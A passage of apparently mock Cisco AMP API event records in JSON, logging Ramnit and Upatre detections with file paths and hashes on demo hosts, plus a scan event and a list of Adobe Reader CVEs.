Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":407000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758218","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\iwkikcbw\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":345000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758215","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":189000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758213","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":17000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758212","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":970000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":939000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892411109048000,"timestamp":1610704826,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361000000300,"timestamp":1610704823,"timestamp_nanoseconds":0,"date":"2021-01-15T10:00:23+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704823,"start_date":"2021-01-15T10:00:23+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263623","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263622","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263621","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":673000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263620","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat 